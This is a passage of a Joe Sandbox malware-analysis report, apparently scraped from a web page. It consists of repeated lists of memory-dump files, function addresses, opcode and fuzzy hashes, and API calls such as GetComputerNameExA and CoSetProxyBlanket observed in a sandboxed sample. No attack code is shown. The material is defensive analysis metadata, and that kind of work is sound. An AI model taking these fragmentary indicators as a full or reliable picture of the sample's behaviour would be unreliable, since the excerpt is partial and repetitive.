Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c8fe8ba12654b0a9663f6a56e54bd666ee3d43914f9ce6d9bb340b6c5ccdfa2a
Instruction ID: 2890d9e1ef12e1ad2c7594cfca3be8d2ff47eb8b2a09c48559ec9d8e619b6352
Opcode Fuzzy Hash: c8fe8ba12654b0a9663f6a56e54bd666ee3d43914f9ce6d9bb340b6c5ccdfa2a
Instruction Fuzzy Hash: 1041D8B4810B40AFD370EF3D9A4B7137EB8AB05250F504B1EF9E6866D4E231A4198BD7

Function 00F2D7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000005,?,?), ref: 00F2DD03

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 717c2ffb631343bcba8966a3c684ed751a83bede57e593ef9146eb6e57e9b05b
Instruction ID: a821f0fa707e3eb5178a8864e70ef7c02f104f0602e4cbbe3a39bd069425eed9
Opcode Fuzzy Hash: 717c2ffb631343bcba8966a3c684ed751a83bede57e593ef9146eb6e57e9b05b
Instruction Fuzzy Hash: 1521D6745447A18FE7268F24D460732BBE1BF5B310F2886CDD4D38B782CA78A441E762

Function 00F2DC76 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000005,?,?), ref: 00F2DD03

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: d742d780d52fe3c043edca9b8c4c408fbedbf4bd05bd274c5e2f17499768c2b9
Instruction ID: 1ce9d4d868e9d6f05e6fe9b405634d88096275023174f5ba03d795c956832736
Opcode Fuzzy Hash: d742d780d52fe3c043edca9b8c4c408fbedbf4bd05bd274c5e2f17499768c2b9
Instruction Fuzzy Hash: D311E7B46447A18BD725CF24D860722BBE2BF5A310B2CC69DD493CB382CA34D441D761

Function 00F3E0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 00F3E0E0

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 12f298154ea406fe748651f612a13bbd8180a5dcd7de7557abc3e0f84da38ef4
Instruction ID: 4cc648e126a525f16e41f656d30fd7bce43c8e0df1751cd911ee6e9e2ab16b4a
Opcode Fuzzy Hash: 12f298154ea406fe748651f612a13bbd8180a5dcd7de7557abc3e0f84da38ef4
Instruction Fuzzy Hash: DAF0E57791C225FBD3502F38BD05B5B3AA4EFD3730F060434F800A6161EB78E816A691

Function 00F0EC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00F0ECA2

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: f038497279d35c66ecec07718d679fbea49f1ad1c965696559f37c4505bb8cb1
Instruction ID: 2934b465223ae0d7ffdf65b34ce6c04cf22f229bfda956190f7968dfa78602c3
Opcode Fuzzy Hash: f038497279d35c66ecec07718d679fbea49f1ad1c965696559f37c4505bb8cb1
Instruction Fuzzy Hash: B3E092383DA7467AF67996259C63F2531169B83F29E306305B7253E3D5CAD03101810D

Function 00F30B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00F30B74

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
